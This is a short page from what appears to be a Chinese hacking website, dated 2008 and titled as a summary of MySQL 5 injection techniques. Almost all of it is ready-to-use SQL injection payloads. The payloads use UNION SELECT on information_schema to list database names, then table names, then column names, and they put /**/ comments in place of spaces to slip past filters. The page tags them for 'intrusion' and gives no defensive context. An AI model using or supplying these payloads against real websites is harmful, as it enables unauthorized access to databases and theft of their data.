繁体中文  设为首页  加入收藏 
当前位置:学院首页 >> 技巧 >> 脚本黑客 >> Mysql5注射技巧总结 浓缩精华


Mysql5注射技巧总结 浓缩精华

2008-05-05 14:20:57  www.hackbase.com  来源:互联网
查库 id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 17(表位置),1/* 查表 id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/ ...

查库

id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 17(表位置),1/*

查表

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**  

/TABLE_SCHEMA=库的HEX值/**/limit/**/17(表位置),1

查段

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/

TABLE_NAME=表的HEX值/**/limit/**/1,1

关键字:Mysql 入侵

责任编辑:黑客基地        



本文引用网址: 

Mysql5注射技巧总结 浓缩精华的相关文章
发表评论